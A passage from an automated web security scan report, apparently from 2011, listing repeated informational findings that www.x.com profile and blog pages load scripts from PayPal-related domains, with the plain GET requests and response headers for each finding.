"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.234. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.235. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.236. https://www.x.com/people/gazugafan

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.237. https://www.x.com/people/gem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.238. https://www.x.com/people/gogoeric

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.239. https://www.x.com/people/hotellina

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.240. https://www.x.com/people/iConcessionStand

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.241. https://www.x.com/people/joncas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.242. https://www.x.com/people/lwhite2104

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.243. https://www.x.com/people/mandeheritage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.244. https://www.x.com/people/odeskdev

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.245. https://www.x.com/people/omuleanu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.246. https://www.x.com/people/pluto26

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.247. https://www.x.com/people/posiden5665

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.248. https://www.x.com/people/ramonmorales123

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.249. https://www.x.com/people/rizkygarut

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.250. https://www.x.com/people/roguereptile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.251. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.252. https://www.x.com/people/sebastian.kopp@wooga.com

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.253. https://www.x.com/people/skier

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
